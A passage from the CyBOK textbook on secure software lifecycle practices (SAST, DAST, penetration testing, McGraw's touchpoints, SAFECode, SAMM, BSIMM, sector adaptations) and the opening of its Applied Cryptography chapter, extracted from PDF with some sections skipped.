CyBOK v1.1.0-4
CyBOK v1.1.0-4
www.cybok.org
the developer environment and be run by the developer during coding. Some SAST tools
spot certain implementation bugs, such as the existence of unsafe or other banned
functions and automatically replace with (or suggest) safer alternatives as the developer
is actively coding. See also the Software Security Knowledge Area (Section 15.3.1).
10. Perform Dynamic Analysis Security Testing (DAST). DAST performs run-time verifica-
tion of compiled or packaged software to check functionality that is only apparent when
all components are integrated and running. DAST often involves the use of a suite of
pre-built attacks and malformed strings that can detect memory corruption, user priv-
ilege issues, injection attacks, and other critical security problems. DAST tools may
employ fuzzing, an automated technique of inputting known invalid and unexpected test
cases at an application, often in large volume. Similar to SAST, DAST can be run by the
developer and/or integrated into the build and deployment pipeline as a check-in gate.
DAST can be considered to be automated penetration testing. See also the Software
Security Knowledge Area (Section 15.3.2).
11. Perform Penetration Testing. Manual penetration testing is black box testing of a run-
ning system to simulate the actions of an attacker. Penetration testing is often performed
by skilled security professionals, who can be internal to an organisation or consultants,
opportunistically simulating the actions of a hacker. The objective of a penetration test
is to uncover any form of vulnerability - from small implementation bugs to major design
flaws resulting from coding errors, system configuration faults, design flaws or other
operational deployment weaknesses. Tests should attempt both unauthorised misuse
of and access to target assets and violations of the assumptions. A widely-referenced
resource for structuring penetration tests is the OWASP Top 10 Most Critical Web Ap-
plication Security Risks10 . As such, penetration testing can find the broadest variety of
vulnerabilities, although usually less efficiently compared with SAST and DAST [1585].
Penetration testers can be referred to as white hat hackers or ethical hackers. In the
penetration and patch model, penetration testing was the only line of security analysis
prior to deploying a system.
12. Establish a Standard Incident Response Process. Despite a secure software lifecycle,
organisations must be prepared for inevitable attacks. Organisations should proactively
prepare an Incident Response Plan (IRP). The plan should include who to contact in
case of a security emergency, establish the protocol for efficient vulnerability mitigation,
for customer response and communication, and for the rapid deployment of a fix. The
IRP should include plans for code inherited from other groups within the organisation
and for third-party code. The IRP should be tested before it is needed. Lessons learned
through responses to actual attack should be factored back into the SDL.
10
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
17.2.1.2 Touchpoints
International software security consultant, Gary McGraw, provided seven Software Security
Touchpoints [1578] by codifying extensive industrial experience with building secure products.
McGraw uses the term touchpoint to refer to software security best practices which can
be incorporated into a secure software lifecycle. McGraw differentiates vulnerabilities that
are implementation bugs and those that are design flaws [1583]. Implementation bugs are
localized errors, such as buffer overflow and input validation errors, in a single piece of
code, making spotting and comprehension easier. Design flaws are systemic problems at the
design level of the code, such as error-handling and recovery systems that fail in an insecure
fashion or object-sharing systems that mistakenly include transitive trust issues [1578]. Kuhn
et al. [1598] analysed the 2008 - 2016 vulnerability data from the US National Vulnerability
Database (NVD)11 and found that 67% of the vulnerabilities were implementation bugs. The
seven touchpoints help to prevent and detect both bugs and flaws.
These seven touchpoints are described below and are provided in order of effectiveness
based upon McGraw’s experience with the utility of each practice over many years, hence
prescriptive:
1. Code Review (Tools).
Code review is used to detect implementation bugs. Manual code review may be used,
but requires that the auditors are knowledgeable about security vulnerabilities before
they can rigorously examine the code. ’Code review with a tool’ (a.k.a. the use of static
analysis tools or SAST) has been shown to be effective and can be used by engineers
that do not have expert security knowledge. For further discussion on static analysis,
see Section 2.1.1 bullet 9.
2. Architectural Risk Analysis.
Architectural Risk Analysis, which can also be referred to as threat modelling (see Section
2.1.1 bullet 4), is used to prevent and detect design flaws. Designers and architects
provide a high-level view of the target system and documentation for assumptions, and
identify possible attacks. Through architectural risk analysis, security analysts uncover
and rank architectural and design flaws so mitigation can begin. For example, risk
analysis may identify a possible attack type, such as the ability for data to be intercepted
and read. This identification would prompt the designers to look at all their code’s traffics
flows to see if interception was a worry, and whether adequate protection (i.e. encryption)
was in place. That review that the analysis prompted is what uncovers design flaws,
such as sensitive data is transported in the clear.
No system can be perfectly secure, so risk analysis must be used to prioritise secu-
rity efforts and to link system-level concerns to probability and impact measures that
matter to the business building the software. Risk exposure is computed by multiply-
ing the probability of occurrence of an adverse event by the cost associated with that
event [1599].
McGraw proposes three basic steps for architectural risk analysis:
• Attack resistance analysis. Attack resistance analysis uses a checklist/systematic
approach of considering each system component relative to known threats, as is
done in Microsoft threat modelling discussed in Section 2.1.1 bullet 4. Information
11
http://nvd.nist.gov
about known attacks and attack patterns are used during the analysis, identifying
risks in the architecture and understanding the viability of known attacks. Threat
modelling with the incorporation of STRIDE-based attacks, as discussed in Section
2.1.1 bullet 4, is an example process for performing attack resistance analysis.
• Ambiguity analysis. Ambiguity analysis is used to capture the creative activity re-
quired to discover new risks. Ambiguity analysis requires two or more experienced
analysts who carry out separate analysis activities in parallel on the same system.
Through unifying the understanding of multiple analysis, disagreements between
the analysts can uncover ambiguity, inconsistency and new flaws.
• Weakness analysis. Weakness analysis is focused on understanding risk related
to security issues in other third-party components (see Section 2.1.1 bullet 7). The
idea is to understand the assumptions being made about third-party software and
what will happen when those assumptions fail.
Risk identification, ranking, and mitigation is a continuous process through the software
lifecycle, beginning with the requirement phase.
3. Penetration Testing.
Penetration testing can be guided by the outcome of architectural risk analysis (See
Section 2.1.2 bullet 2). For further discussion on penetration testing, see Section 2.1.1,
bullet 11.
4. Risk-based Security Testing.
Security testing must encompass two strategies: (1) testing of security functionality with
standard functional testing techniques; and (2) risk-based testing based upon attack
patterns and architectural risk analysis results (see Section 2.1.2 bullet 2), and abuse
cases (see Section 2.1.2 bullet 5). For web applications, testing of security functionality
can be guided by the OWASP Application Security Verfication Standard (ASVS) Project12
open standard for testing application technical security controls. ASVS also provides
developers with a list of requirements for secure development.
Guiding tests with knowledge of the software architecture and construction, common
attacks, and the attacker’s mindset is extremely important. Using the results of archi-
tectural risk analysis, the tester can properly focus on areas of code where an attack is
likely to succeed.
The difference between risk-based testing and penetration testing is the level of the
approach and the timing of the testing. Penetration testing is done when the software is
complete and installed in an operational environment. Penetration tests are outside-in,
black box tests. Risk-based security testing can begin before the software is complete
and even pre-integration, including the use of white box unit tests and stubs. The two are
similar in that they both should be guided by risk analysis, abuse cases and functional
security requirements.
5. Abuse Cases.
This touchpoint codifies ’thinking like an attacker’. Use cases describe the desired
system’s behaviour by benevolent actors. Abuse cases [1586] describe the system’s
behaviour when under attack by a malicious actor. To develop abuse cases, an analyst
12
https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home
enumerates the types of malicious actors who would be motivated to attack the system.
For each bad actor, the analyst creates one or more abuse case(s) for the functionality the
bad actor desires from the system. The analyst then considers the interaction between
the use cases and the abuse cases to fortify the system. Consider an automobile
example. An actor is the driver of the car, and this actor has a use case ’drive the car’.
A malicious actor is a car thief whose abuse case is ’steal the car’. This abuse case
threatens the use case. To prevent the theft, a new use case ’lock the car’ can be added
to mitigate the abuse case and fortify the system.
Human error is responsible for a large number of breaches. System analysts should
also consider actions by benevolent users, such as being the victim of a phishing attack,
that result in a security breach. These actions can be considered misuse cases [1587]
and should be analysed similarly to abuse cases, considering what use case the misuse
case threatens and the fortification to the system to mitigate the misuse case.
The attacks and mitigations identified by the abuse and misuse case analysis can be
used as input into the security requirements (Section 2.1.1 bullet 2.); penetration testing
(Section 2.1.1 bullet 11); and risk-based security testing (Section 2.1.2 bullet 4).
6. Security Requirements.
For further discussion on security requirements, see Section 2.1.1 bullet 2.
7. Security Operations.
Network security can integrate with software security to enhance the security posture.
Inevitably, attacks will happen, regardless of the applications of the other touchpoints.
Understanding attacker behaviour and the software that enabled a successful attack is
an essential defensive technique. Knowledge gained by understanding attacks can be
fed back into the six other touchpoints.
The seven touchpoints are intended to be cycled through multiple times as the software
product evolves. The touchpoints are also process agnostic, meaning that the practices can
be included in any software development process.
17.2.1.3 SAFECode
The Software Assurance Forum for Excellence in Code (SAFECode)13 is a non-profit, global,
industry-led organisation dedicated to increasing trust in information and communications
technology products and services through the advancement of effective software assurance
methods. The SAFECode mission is to promote best practices for developing and delivering
more secure and reliable software, hardware and services. The SAFECode organisation pub-
lishes the ’Fundamental practices for secure software development: Essential elements of a
secure development lifecycle program’ [1600] guideline to foster the industry-wide adoption of
fundamental secure development practices. The fundamental practices deal with assurance
– the ability of the software to withstand attacks that attempt to exploit design or imple-
mentation errors. The eight fundamental practices outlined in their guideline are described
below:
1. Application Security Control Definition. SAFECode uses the term Application Security
Controls (ASC) to refer to security requirements (see Section 2.1.1 bullet 2). Similarly,
13
https://safecode.org/
NIST 800-53 [53] uses the phrase security control to refer to security functionality and
security assurance requirements.
The inputs to ASC include the following: secure design principles (see Section 2.1.3 bullet
3); secure coding practices; legal and industry requirements with which the application
needs to comply (such as HIPAA, PCI, GDPR, or SCADA); internal policies and standards;
incidents and other feedback; threats and risk. The development of ASC begins before
the design phase and continues throughout the lifecycle to provide clear and actionable
controls and to be responsive to changing business requirements and the ever-evolving
threat environment.
2. Design. Software must incorporate security features to comply with internal security
practices and external laws or regulations. Additionally, the software must resist known
threats based upon the operational environment. (see Section 2.1.1 bullet 5.) Threat
modelling (see Section 2.1.1 bullet 4), architectural reviews, and design reviews can be
used to identify and address design flaws before their implementation into source code.
The system design should incorporate an encryption strategy (see Section 2.1.1 bullet 6)
to protect sensitive data from unintended disclosure or alteration while the data are at
rest or in transit.
The system design should use a standardised approach to identity and access man-
agement to perform authentication and authorisation. The standardisation provides
consistency between components and clear guidance on how to verify the presence of
the proper controls. Authenticating the identity of a principal (be it a human user, other
service or logical component) and verifying the authorisation to perform an action are
foundational controls of the system. Several access control schemes have been devel-
oped to support authorisation: mandatory, discretionary, role-based or attribute-based.
Each of these has benefits and drawbacks and should be chosen based upon project
characteristics.
Log files provide the evidence needed in forensic analysis when a breach occurs to
mitigate repudiation threats. In a well-designed application, system and security log files
provide the ability to understand an application’s behaviour and how it is used at any
moment, and to distinguish benevolent user behaviour from malicious user behaviour.
Because logging affects the available system resources, the logging system should be
designed to capture the critical information while not capturing excess data. Policies and
controls need to be established around storing, tamper prevention and monitoring log
files. OWASP provides valuable resources on designing and implementing logging1415 .
3. Secure Coding Practices. Unintended code-level vulnerabilities are introduced by pro-
grammer mistakes. These types of mistakes can be prevented and detected through the
use of coding standards; selecting the most appropriate (and safe) languages, frame-
works and libraries, including the use of their associated security features (see Section
2.1.1 bullet 8); using automated analysis tools (see Section 2.1.1 bullets 9 and 10); and
manually reviewing the code.
Organisations provide standards and guidelines for secure coding, for example:
(a) OWASP Secure Coding Practices, Quick Reference Guide 16
14
https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html
15
https://www.owasp.org/images/e/e0/OWASP_Logging_Guide.pdf
16
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Training will be needed (see Section 2.1.1 bullet 1). The specification of the organisation’s
secure software lifecycle including the roles and responsibilities should be documented.
Plans for compliance and process health should be made (see Section 17.4).
• Planning the
Education and implementation and
awareness • Provide training
deployment of secure
development
• Define security
Analysis and requirements • Abuse cases • Application security
requirements control definition
• Perform threat • Security requirements
modelling
17.3.2 Mobile
Security concerns for mobile apps differ from traditional desktop software in some important
ways, including local data storage, inter-app communication, proper usage of cryptographic
APIs and secure network communication. The OWASP Mobile Security Project [1605] is a
resource for developers and security teams to build and maintain secure mobile applications;
see also the Web & Mobile Security Knowledge Area (Chapter 16).
Four resources are provided to aid in the secure software lifecycle of mobile applications:
1. OWASP Mobile Application Security Verification Standard (MASVS) Security Require-
ments and Verification. The MASVS defines a mobile app security model and lists
generic security requirements for mobile apps. The MASVS can be used by architects,
developers, testers, security professionals, and consumers to define and understand
the qualities of a secure mobile app.
2. Mobile Security Testing Guide (MSTG). The guide25 is a comprehensive manual for
mobile application security testing and reverse engineering for iOS and Android mobile
security testers. The guide provides the following content:
(a) A general mobile application testing guide that contains a mobile app security test-
ing methodology and general vulnerability analysis techniques as they apply to
mobile app security. The guide also contains additional technical test cases that are
operating system independent, such as authentication and session management,
network communications, and cryptography.
(b) Operating system-dependent testing guides for mobile security testing on the An-
droid and iOS platforms, including security basics; security test cases; reverse
engineering techniques and prevention; and tampering techniques and prevention.
(c) Detailed test cases that map to the requirements in the MASVS.
3. Mobile App Security Checklist. The checklist26 is used for security assessments and
contains links to the MSTG test case for each requirement.
4. Mobile Threat Model. The threat model [1606] provides a checklist of items that should
be documented, reviewed and discussed when developing a mobile application. Five
areas are considered in the threat model:
(a) Mobile Application Architecture. The mobile application architecture describes
device-specific features used by the application, wireless transmission protocols,
data transmission medium, interaction with hardware components and other appli-
cations. The attack surface can be assessed through a mapping to the architecture.
(b) Mobile Data. This section of the threat model defines the data the application
stores, transmits and receives. The data flow diagrams should be reviewed to
determine exactly how data are handled and managed by the application.
(c) Threat Agent Identification. The threat agents are enumerated, including humans
and automated programs.
(d) Methods of Attack. The most common attacks utilised by threat agents are defined
so that controls can be developed to mitigate attacks.
25
https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide
26
https://github.com/OWASP/owasp-mstg/tree/master/Checklists
3. Trusted Compute Pools. Trusted Compute Pools are either physical or logical groupings
of compute resources/systems in a data centre that share a security posture. These
systems provide measured verification of the boot and runtime infrastructure for mea-
sured launch and trust verification. The measurements are stored in a trusted location
on the system (referred to as a Trusted Platform Module (TPM)) and verification occurs
when an agent, service or application requests the trust quote from the TPM. Practices:
(a) Ensure the platform for developing cloud applications provides trust measurement
capabilities and the APIs and services necessary for your applications to both
request and verify the measurements of the infrastructure they are running on.
(b) Verify the trust measurements as either part of the initialisation of your application
or as a separate function prior to launching the application.
(c) Audit the trust of the environments your applications run on using attestation
services or native attestation features from your infrastructure provider.
4. Data Encryption and Key Management. Encryption is the most pervasive means of
protecting sensitive data both at rest and in transit. When encryption is used, both
providers and tenants must ensure that the associated cryptographic key materials are
properly generated, managed and stored. Practices:
(a) When developing an application for the cloud, determine if cryptographic and key
management capabilities need to be directly implemented in the application or
if the application can leverage cryptographic and key management capabilities
provided by the PaaS environment.
(b) Make sure that appropriate key management capabilities are integrated into the
application to ensure continued access to data encryption keys, particularly as the
data move across cloud boundaries, such as enterprise to cloud or public to private
cloud.
5. Authentication and Identity Management. As an authentication consumer, the appli-
cation may need to authenticate itself to the PaaS to access interfaces and services
provided by the PaaS. As an authentication provider, the application may need to authen-
ticate the users of the application itself. Practices:
(a) Cloud application developers should implement the authentication methods and
credentials required for accessing PaaS interfaces and services.
(b) Cloud application developers need to implement appropriate authentication meth-
ods for their environments (private, hybrid or public).
(c) When developing cloud applications to be used by enterprise users, developers
should consider supporting Single Sign On (SSO) solutions.
6. Shared-Domain Issues. Several cloud providers offer domains that developers can use
to store user content, or for staging and testing their cloud applications. As such, these
domains, which may be used by multiple vendors, are considered ’shared domains’ when
running client-side script (such as JavaScript) and from reading data. Practices:
(a) Ensure that your cloud applications are using custom domains whenever the cloud
provider’s architecture allows you to do so.
(b) Review your source code for any references to shared domains.
The European Union Agency for Cybersecurity (ENISA) [1609] conducted an in-depth and
independent analysis of the information security benefits and key security risks of cloud
computing. The analysis reports that the massive concentrations of resources and data in the
cloud present a more attractive target to attackers, but cloud-based defences can be more
robust, scalable and cost-effective.
3. The automotive industry should document the details related to their cyber security
process, including the results of risk assessment, penetration testing and organisa-
tions decisions related to cyber security. Essential documents, such as cyber security
requirements, should follow a robust version control protocol.
4. These security requirements should be incorporated into the product’s security require-
ments, as laid out in Section 2.1.1 bullet 2, Section 2.1.2 bullet 6, and Section 2.1.3 bullet
1.:
(a) Limit developer/debugging access to production devices, such as through an open
debugging port or through a serial console.
(b) Keys (e.g., cryptographic) and passwords which can provide an unauthorised, el-
evated level of access to vehicle computing platforms should be protected from
disclosure. Keys should not provide access to multiple vehicles.
(c) Diagnostic features should be limited to a specific mode of vehicle operation
which accomplishes the intended purpose of the associated feature. For example,
a diagnostic operation which may disable a vehicle’s individual brakes could be
restricted to operating only at low speeds or not disabling all the brakes at the same
time.
(d) Encryption should be considered as a useful tool in preventing the unauthorised
recovery and analysis of firmware.
(e) Limit the ability to modify firmware and/or employ signing techniques to make it
more challenging for malware to be installed on vehicles.
(f) The use of network servers on vehicle ECUs should be limited to essential func-
tionality, and services over these ports should be protected to prevent use by
unauthorised parties.
(g) Logical and physical isolation techniques should be used to separate processors,
vehicle networks, and external connections as appropriate to limit and control
pathways from external threat vectors to cyber-physical features of vehicles.
(h) Sending safety signals as messages on common data buses should be avoided, but
when used should employ a message authentication scheme to limit the possibility
of message spoofing.
(i) An immutable log of events sufficient to enable forensic analysis should be main-
tained and periodically scrutinised by qualified maintenance personnel to detect
trends of cyber-attack.
(j) Encryption methods should be employed in any IP-based operational communi-
cation between external servers and the vehicle, and should not accept invalid
certificates.
(k) Plan for and design-in features that could allow for changes in network routing
rules to be quickly propagated and applied to one, a subset or all vehicles
The International Organization for Standardization (ISO)34 and the Society for Automotive
Engineering (SAE) International 35 are jointly developing an international Standard, ISO 21434
34
https://www.iso.org/standard/70918.html
35
www.sae.org
Road vehicles - cyber security engineering36 . The standard will specify minimum requirements
on security engineering processes and activities, and will define criteria for assessment.
Explicitly, the goal is to provide a structured process to ensure cyber security is designed in
upfront and integrated throughout the lifecycle process for both hardware and software.
The adoption of a secure software lifecycle in the automotive industry may be driven by
legislation, such as through the US SPY Car Act37 or China and Germany’s Intelligent and
Connected Vehicles (ICVs) initiative38 .
17.4.1 SAMM
The Software Assurance Maturity Model (SAMM)40 is an open framework to help organisations
formulate and implement a strategy for software security that is tailored to the specific risks
facing the organisation. Resources are provided for the SAMM to enable an organisation to
do the following:
1. Define and measure security-related activities within an organisation.
2. Evaluate their existing software security practices.
3. Build a balanced software security program in well-defined iterations.
4. Demonstrate improvements in a security assurance program.
Because each organisation utilises its own secure software process (i.e., its own unique
combination of the practices laid out in Sections 2 and 3), the SAMM provides a framework to
describe software security initiatives in a common way. The SAMM designers enumerated
activities executed by organisations in support of their software security efforts. Some ex-
ample activities include: build and maintain abuse case models per project; specify security
requirements based upon known risks; and identify the software attack surface. These activi-
ties are categorised into one of 12 security practices. The 12 security practices are further
grouped into one of four business functions. The business functions and security practices
are as follows:
1. Business Function: Governance
(a) Strategy and metrics
(b) Policy and compliance
(c) Education and guidance
2. Business Function: Construction
(a) Threat assessment
(b) Security requirements
(c) Secure architecture
3. Business Function: Verification
(a) Design review
(b) Code review
(c) Security testing
40
https://www.opensamm.org/ and https://www.owasp.org/images/6/6f/SAMM_Core_V1-5_FINAL.pdf
17.4.2 BSIMM
Gary McGraw, Sammy Migues, and Brian Chess desired to create a descriptive model of the
state-of-the-practice in secure software development lifecycle. As a result, they forked an early
version of SAMM (see Section 4.1) to create the original structure of the Building Security In
Maturity Model (BSIMM) [1612, 1613] in 2009. Since that time, the BSIMM has been used to
structure a multi-year empirical study of the current state of software security initiatives in
industry.
Because each organisation utilises its own secure software process (i.e., its own unique
combination of the practices laid out in Sections 2 and 3), the BSIMM provides a framework
to describe software security initiatives in a common way. Based upon their observations,
the BSIMM designers enumerated 113 activities executed by organisations in support of
their software security efforts. Some example activities include: build and publish security
features; use automated tools along with a manual review; and integrate black-box security
tools into the quality assurance process. Each activity is associated with a maturity level and
is categorised into one of 12 practices. The 12 practices are further grouped into one of four
domains. The domains and practices are as follows:
1. Domain: Governance
(a) Strategy and metrics
(b) Compliance and policy
(c) Training
2. Domain: Intelligence
(a) Attack models
(b) Security features and design
(c) Standards and requirements
DISCUSSION
[1615]
This chapter has provided an overview of of three prominent and prescriptive secure software
lifecycle processes and six adaptations of these processes that can be applied in a specified
domain. However, the cybersecurity landscape in terms of threats, vulnerabilities, tools, and
practices is ever evolving. For example, a practice has has not be been mentioned in any of
these nine processes is the use of a bug bounty program for the identification and resolution
of vulnerabilities. With a bug bounty program, organisations compensate individuals and/or
researchers for finding and reporting vulnerabilities. These individuals are external to the
organisation producing the software and may work independently or through a bug bounty
organisation, such as HackerOne42 .
While the majority of this knowledge area focuses on technical practices, the successful
adoption of these practices involves organisational and cultural changes in an organisation.
The organisation, starting from executive leadership, must support the extra training, resources,
and steps needed to use a secure development lifecycle. Additionally, every developer must
uphold his or her responsibility to take part in such a process.
A team and an organisation need to choose the appropriate software security practices to de-
velop a customised secure software lifecycle based upon team and technology characteristics
and upon the security risk of the product.
While this chapter has provided practices for developing secure products, information in-
security is often due to economic disincentives [1615] which drives software organizations
to choose the rapid deployment and release of functionality over the production of secure
products. As a result, increasingly governments and industry groups are imposing cyber
security standards on organisations as a matter of legal compliance or as a condition for
being considered as a vendor. Compliance requirements may lead to faster adoption of a
secure development lifecycle. However, this compliance-driven adoption may divert efforts
away from the real security issues by driving an over-focus on compliance requirements rather
than on the pragmatic prevention and detection of the most risky security concerns.
42
https://www.hackerone.com
[1600]
[1469]
[1572]
[1577]
17.1 Motivation c1 c1 c1
17.2 Prescriptive Secure Software Lifecycle Processes
17.2.1 Secure Software Lifecycle Processes c2 c2 c2 c2
17.2.2 Comparing the Secure Software Lifecycle Models
17.3 Adaptations of the Secure Software Lifecycle
17.3.1 Agile Software Development and DevOps c3
17.3.2 Mobile
17.3.3 Cloud Computing
17.3.4 Internet of Things (IoT)
17.3.5 Road Vehicles
17.3.6 ECommerce/Payment Card Industry
17.4 Assessing the Secure Software Lifecycle
17.5 Adopting a Secure Software Lifecycle
FURTHER READING
Building Secure Software: How to Avoid Security Problems the Right Way
[1469]
This book introduces the term software security as an engineering discipline for building
security into a product. This book provides essential lessons and expert techniques for
security professionals who understand the role of software in security problems and for
software developers who want to build secure code. The book also discusses risk assessment,
developing security tests, and plugging security holes before software is shipped.
Security controls
Government and standards organizations have provided security controls to be integrated in
a secure software or systems lifecyle:
1. The Trustworthy Software Foundation 46 provides the the Trustworthy Software Frame-
work (TSFr) 47 a collection of good practice, existing guidance and relevant standards
across the five main facets of trustworthiness: Safety; Reliability; Availability; Resilience;
and Security. The purpose of the TSFr is to provide a minimum set of controls such that,
when applied, all software (irrespective of implementation constraints) can be specified,
realised and used in a trustworthy manner.
2. The US National Institute of Standards and Technology (NIST) has authored the Sys-
tems Security Engineering Cyber Resiliency Considerations for the Engineering [1617]
framework (NIST SP 800-160). This Framework provides resources on cybersecurity
Knowledge, Skills and Abilitiess (KSAs), and tasks for a number of work roles for achiev-
ing the identified cyber resiliency outcomes based on a systems engineering perspective
on system life cycle processes.
3. The Software Engineering Institute (SEI) has collaborated with professional organisa-
tions, industry partners and institutions of higher learning to develop freely-available
curricula and educational materials. Included in these materials are resources for a
software assurance program48 to train professionals to build security and correct func-
tionality into software and systems.
4. The UK National Cyber Security Centre (NCSC)49 provide resources for secure software
development:
45
https://www.owasp.org/
46
https://tsfdn.org
47
https://tsfdn.org/ts-framework/
48
https://www.sei.cmu.edu/education-outreach/curricula/software-assurance/index.cfm
49
https://www.ncsc.gov.uk/
Training materials
Training materials are freely-available on the Internet. Some sites include the following:
1. The Trustworthy Software Foundation provides a resource library 53 of awareness mate-
rials and guidance targeted for those who teach trustworthy software principles, those
who seek to learn about Trustworthy Software and those who want to ensure that the
software they use is trustworthy. The resources available include a mixture of documents,
videos, animations and case studies.
2. The US National Institute of Standards and Technology (NIST) has created the NICE
Cyber security Workforce Framework [1618]. This Framework provides resources on
cyber security Knowledge, Skills and Abilitiess (KSAs), and tasks for a number of work
roles.
3. The Software Engineering Institute (SEI) has collaborated with professional organisa-
tions, industry partners and institutions of higher learning to develop freely-available
curricula and educational materials. Included in these materials are resources for a
software assurance program54 to train professionals to build security and correct func-
tionality into software and systems.
4. SAFECode offers free software security training courses delivered via on-demand web-
casts55 .
50
https://www.ncsc.gov.uk/collection/application-development
51
https://www.ncsc.gov.uk/collection/developers-collection
52
https://www.ncsc.gov.uk/blog-post/leaky-pipe-secure-coding
53
https://tsfdn.org/resource-library/
54
https://www.sei.cmu.edu/education-outreach/curricula/software-assurance/index.cfm
55
https://safecode.org/training/
591
Chapter 18
Applied Cryptography
Kenneth G. Paterson ETH Zürich
593
The Cyber Security Body Of Knowledge
www.cybok.org
INTRODUCTION
This document provides a broad introduction to the field of cryptography, focusing on ap-
plied aspects of the subject. It complements the Cryptography Knowledge Area (Chapter 10)
which focuses on formal aspects of cryptography (including definitions and proofs) and on
describing the core cryptographic primitives. That said, formal aspects are highly relevant
when considering applied cryptography. As we shall see, they are increasingly important when
it comes to providing security assurance for real-world deployments of cryptography.
The overall presentation assumes a basic knowledge of either first-year undergraduate mathe-
matics, or that found in a discrete mathematics course of an undergraduate Computer Science
degree. Good cryptography textbooks that cover the required material include [963, 1619, 1620].
We begin by informally laying out the key themes that we will explore in the remainder of the
document.
Cryptography is a Mongrel
Cryptography draws from a number of fields including mathematics, theoretical computer
science and software and hardware engineering. For example, the security of many public key
algorithms depends on the hardness of mathematical problems which come from number
theory, a venerable branch of mathematics. At the same time, to securely and efficiently
implement such algorithms across a variety of computing platforms requires a solid under-
standing of the engineering aspects. To make these algorithms safely usable by practitioners,
one should also draw on usability and Application Programming Interface (API) design. This
broad base has several consequences. Firstly, almost no-one understands all aspects of the
field perfectly (including the present author). Secondly this creates gaps — between theory
and practice, between design and implementation (typically in the form of a cryptographic
library, a collection of algorithm and protocol implementations in a specific programming
language) and between implementations and their eventual use by potentially non-expert
developers. Thirdly, these gaps lead to security vulnerabilities. In fact, it is rare that standard-
ised, widely-deployed cryptographic algorithms directly fail when they are properly used. It is
more common that cryptography fails for indirect reasons — through unintentional misuse
of a library API by a developer, on account of bad key management, because of improper
combination of basic cryptographic algorithms in a more complex system, or due to some
form of side-channel leakage. All of these topics will be discussed in more detail.
Cryptography 6= Encryption
In the popular imagination cryptography equates to encryption; a cryptographic mechanism
providing confidentiality services. In reality, cryptography goes far beyond this to provide an
underpinning technology for building security services more broadly. Thus, secure communi-
cations protocols like Transport Layer Security (TLS) rely on both encryption mechanisms
(Authenticated Encryption, AE) and integrity mechanisms (e.g. digital signature schemes) to
achieve their security goals. In fact, in its most recent incarnation (version 1.3), TLS relies
exclusively on Diffie-Hellman key exchange to establish the keying material that it consumes,
whereas earlier versions allowed the use of public key encryption for this task. We will discuss
TLS more extensively in Section 18.5; here the point is that, already in the literally classic
application of cryptography, encryption is only one of many techniques used.
Moreover, since the boom in public research in cryptography starting in the late 1970s, re-
searchers have been incredibly fecund in inventing new types of cryptography to solve seem-
ingly impossible tasks. Whilst many of these new cryptographic gadgets were initially of purely
theoretical interest, the combination of Moore’s law and the growth of technologies such as
cloud computing has made some of them increasingly important in practice. Researchers
have developed some of these primitives to the point where they are efficient enough to be
used in large-scale applications. Some examples include the use of zero-knowledge proofs
in anonymous cryptocurrencies, the use of Multi-Party Computation (MPC) techniques to
enable computations on sensitive data in environments where parties are mutually untrusting,
and the (to date, limited) use of Fully Homomorphic Encryption (FHE) for privacy-preserving
machine learning.
equality across multiple encryptions. This example, while simple, is not artificial: the SSH
protocol historically used such an E&M scheme and only avoided the security failure due
to the inclusion of a per-message sequence number as part of the plaintext (this sequence
number was also needed to achieve other security properties of the SSH secure channel).
This example generalises, in the sense that even small and seemingly trivial details can have
a large effect on security: in cryptography, every bit matters.
In view of the above observations, applied cryptography is properly concerned with a broader
sweep of topics than just the low-level cryptographic algorithms. Of course these are still
crucial and we will cover them briefly. However, applied cryptography is also about the inte-
gration of cryptography into systems and development processes, the thorny topic of key
management and even the interaction of cryptography with social processes, practices and
relations. We will touch on all of these aspects.
Cryptography is Political
Like many other technologies, cryptography can be used for good or ill. It is used by human
rights campaigners to securely organise their protests using messaging apps like Telegram
and Signal [1621]. It is used by individuals who wish to maintain their privacy against the incur-
sions of tech companies. It enables whistle-blowers to securely communicate with journalists
when disclosing documents establishing company or governmental wrong-doing (see Privacy
& Online Rights Knowledge Area (Section 5.4)). But it can also be used by terrorists to plan
attacks or by child-abusers to share illegal content. Meanwhile cryptocurrencies can be used
by drug dealers to launder money [1622] and as a vehicle for extracting ransom payments.1
These examples are chosen to highlight that cryptography, historically the preserve of govern-
ments and their militaries, is now in everybody’s hands — or more accurately, on everybody’s
phone. This is despite intensive, expensive efforts over decades on the part of governments
to regulate the use of cryptography and the distribution of cryptographic technology through
export controls. Indeed, such laws continue to exist, and violations of them can produce
severe negative consequences so practitioners should be cautious to research applicable
regulation (see Law & Regulation Knowledge Area (Section 3.11.3) for further discussion of
this topic).
But the cryptographic genie has escaped the bottle and is not going back in. Indeed, crypto-
graphic software of reasonable quality is now so widespread that attempts to prevent its use
or to introduce government-mandated back-doors are rendered irrelevant for anyone with a
modicum of skill. This is to say nothing as to whether it is even possible to securely engineer
cryptographic systems that support exceptional access for a limited set of authorised parties,
something which experts doubt, see for example [1624]. Broadly, these efforts at control and
the reaction to them by individual researchers, as well as companies, are colloquially known
as The Crypto Wars. Sometimes, these are enumerated, though it is arguable that the First
Crypto War never ended, but simply took on another, less-intense, less-visible form, as became
apparent from the Snowden revelations [1625].
1
On the other hand, a 2019 RAND report [1623] concluded there is little evidence for use of cryptocurrencies
by terrorist groups.
Organisation
Having laid out the landscape of Applied Cryptography, we now turn to a more detailed
consideration of sub-topics. The next section is concerned with cryptographic algorithms
and schemes — the building blocks of cryptography. It also discusses protocols, which typi-
cally combine multiple algorithms into a more complex system. In Section 18.2 we discuss
implementation aspects of cryptography, addressing what happens when we try to turn a
mathematical description of a cryptographic algorithm into running code. Cryptography simply
translates the problem of securing data into that of securing and managing cryptographic
keys, following Wheeler’s aphorism that every problem in computer science can be solved by
another level of indirection. We address the topic of key management in Section 18.3. Sec-
tion 18.4 covers a selection of issues that may arise for non-expert consumers of cryptography,
while Section 18.5 discusses a few core cryptographic applications as a means of showing
how the different cryptographic threads come together in specific cases. Finally, Section 18.6
looks to the future of applied cryptography and conveys closing thoughts.
2
Here, for example, FIDO is developing open specifications of interfaces for authenticating users to web-
based applications and services using public key cryptography.
3
This concept refers to methods by which a hardware platform can provide security guarantees to third
parties about how it will execute code. It is addressed in the Hardware Security Knowledge Area (Chapter 20).
k = 56 which was considered by experts already too short when the algorithm was introduced
